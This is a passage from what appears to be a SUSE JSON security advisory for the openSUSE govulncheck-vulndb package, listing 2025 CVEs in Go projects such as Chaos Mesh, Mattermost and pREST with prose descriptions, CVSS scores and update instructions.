"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58063",
"url": "https://www.suse.com/security/cve/CVE-2025-58063"
},
{
"category": "external",
"summary": "SUSE Bug 1249389 for CVE-2025-58063",
"url": "https://bugzilla.suse.com/1249389"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-58063"
},
{
"cve": "CVE-2025-58157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58157"
}
],
"notes": [
{
"category": "general",
"text": "gnark is a zero-knowledge proof system framework. In version 0.12.0, there is a potential denial of service vulnerability when computing scalar multiplication is using the fake-GLV algorithm. This is because the algorithm didn\u0027t converge quickly enough for some of the inputs. This issue has been patched in version 0.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58157",
"url": "https://www.suse.com/security/cve/CVE-2025-58157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58157"
},
{
"cve": "CVE-2025-58158",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58158"
}
],
"notes": [
{
"category": "general",
"text": "Harness Open Source is an end-to-end developer platform with Source Control Management, CI/CD Pipelines, Hosted Developer Environments, and Artifact Registries. Prior to version 3.3.0, Open Source Harness git LFS server (Gitness) exposes api to retrieve and upload files via git LFS. Implementation of upload git LFS file api is vulnerable to arbitrary file write. Due to improper sanitization for upload path, a malicious authenticated user who has access to Harness Gitness server api can use a crafted upload request to write arbitrary file to any location on file system, may even compromise the server. Users using git LFS are vulnerable. This issue has been patched in version 3.3.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58158",
"url": "https://www.suse.com/security/cve/CVE-2025-58158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58158"
},
{
"cve": "CVE-2025-58430",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58430"
}
],
"notes": [
{
"category": "general",
"text": "listmonk is a standalone, self-hosted, newsletter and mailing list manager. In versions up to and including 1.1.0, every http request in addition to the session cookie `session` there included `nonce`. The value is not checked and validated by the backend, removing `nonce` allows the requests to be processed correctly. This may seem harmless, but if chained to other vulnerabilities it can become a critical vulnerability. Cross-site request forgery and cross-site scripting chained together can result in improper admin account creation. As of time of publication, no patched versions are available.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58430",
"url": "https://www.suse.com/security/cve/CVE-2025-58430"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-58430"
},
{
"cve": "CVE-2025-58437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58437"
}
],
"notes": [
{
"category": "general",
"text": "Coder allows organizations to provision remote development environments via Terraform. In versions 2.22.0 through 2.24.3, 2.25.0 and 2.25.1, Coder can be compromised through insecure session handling in prebuilt workspaces. Coder automatically generates a session token for a user when a workspace is started. It is automatically exposed via coder_workspace_owner.session_token. Prebuilt workspaces are initially owned by a built-in prebuilds system user. When a prebuilt workspace is claimed, a new session token is generated for the user that claimed the workspace, but the previous session token for the prebuilds user was not expired. Any Coder workspace templates that persist this automatically generated session token are potentially impacted. This is fixed in versions 2.24.4 and 2.25.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58437",
"url": "https://www.suse.com/security/cve/CVE-2025-58437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58437"
},
{
"cve": "CVE-2025-58445",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58445"
}
],
"notes": [
{
"category": "general",
"text": "Atlantis is a self-hosted golang application that listens for Terraform pull request events via webhooks. All versions of Atlantis publicly expose detailed version information through its /status endpoint. This information disclosure could allow attackers to identify and target known vulnerabilities associated with the specific versions, potentially compromising the service\u0027s security posture. This issue does not currently have a fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58445",
"url": "https://www.suse.com/security/cve/CVE-2025-58445"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58445"
},
{
"cve": "CVE-2025-58450",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58450"
}
],
"notes": [
{
"category": "general",
"text": "pREST (PostgreSQL REST), is an API that delivers an application on top of a Postgres database. SQL injection is possible in versions prior to 2.0.0-rc3. The validation present in versions prior to 2.0.0-rc3 does not provide adequate protection from injection attempts. Version 2.0.0-rc3 contains a patch to mitigate such attempts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58450",
"url": "https://www.suse.com/security/cve/CVE-2025-58450"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-58450"
},
{
"cve": "CVE-2025-59358",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59358"
}
],
"notes": [
{
"category": "general",
"text": "The Chaos Controller Manager in Chaos Mesh exposes a GraphQL debugging server without authentication to the entire Kubernetes cluster, which provides an API to kill arbitrary processes in any Kubernetes pod, leading to cluster-wide denial of service.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59358",
"url": "https://www.suse.com/security/cve/CVE-2025-59358"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59358"
},
{
"cve": "CVE-2025-59359",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59359"
}
],
"notes": [
{
"category": "general",
"text": "The cleanTcs mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59359",
"url": "https://www.suse.com/security/cve/CVE-2025-59359"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59359"
},
{
"cve": "CVE-2025-59360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59360"
}
],
"notes": [
{
"category": "general",
"text": "The killProcesses mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59360",
"url": "https://www.suse.com/security/cve/CVE-2025-59360"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59360"
},
{
"cve": "CVE-2025-59361",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59361"
}
],
"notes": [
{
"category": "general",
"text": "The cleanIptables mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59361",
"url": "https://www.suse.com/security/cve/CVE-2025-59361"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59361"
},
{
"cve": "CVE-2025-7445",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-7445"
}
],
"notes": [
{
"category": "general",
"text": "Kubernetes secrets-store-sync-controller in versions before 0.0.2 discloses service account tokens in logs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-7445",
"url": "https://www.suse.com/security/cve/CVE-2025-7445"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-7445"
},
{
"cve": "CVE-2025-8396",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-8396"
}
],
"notes": [
{
"category": "general",
"text": "Insufficiently specific bounds checking on authorization header could lead to denial of service in the Temporal server on all platforms due to excessive memory allocation.This issue affects all platforms and versions of OSS Server prior to 1.26.3, 1.27.3, and 1.28.1 (i.e., fixed in 1.26.3, 1.27.3, and 1.28.1 and later). Temporal Cloud services are not impacted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-8396",
"url": "https://www.suse.com/security/cve/CVE-2025-8396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-8396"
},
{
"cve": "CVE-2025-9072",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9072"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.10.x \u003c= 10.10.1, 10.5.x \u003c= 10.5.9, 10.9.x \u003c= 10.9.4 fail to validate the redirect_to parameter, allowing an attacker to craft a malicious link that, once a user authenticates with their SAML provider, could post the user\u0027s cookies to an attacker-controlled URL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9072",
"url": "https://www.suse.com/security/cve/CVE-2025-9072"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-9072"
},
{
"cve": "CVE-2025-9076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9076"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.10.x \u003c= 10.10.1 fail to properly sanitize user data during shared channel membership synchronization, which allows malicious or compromised remote clusters to access sensitive user information via unsanitized user objects. This vulnerability affects Mattermost Server instances with shared channels enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9076",
"url": "https://www.suse.com/security/cve/CVE-2025-9076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9076"
},
{
"cve": "CVE-2025-9078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9078"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.8.x \u003c= 10.8.3, 10.5.x \u003c= 10.5.8, 9.11.x \u003c= 9.11.17, 10.10.x \u003c= 10.10.1, 10.9.x \u003c= 10.9.3 fail to properly validate cache keys for link metadata which allows authenticated users to access unauthorized posts and poison link previews via hash collision attacks on FNV-1 hashing",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9078",
"url": "https://www.suse.com/security/cve/CVE-2025-9078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9078"
},
{
"cve": "CVE-2025-9084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9084"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.5.x \u003c= 10.5.9 fail to properly validate redirect URLs which allows attackers to redirect users to malicious sites via crafted OAuth login URLs",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9084",
"url": "https://www.suse.com/security/cve/CVE-2025-9084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
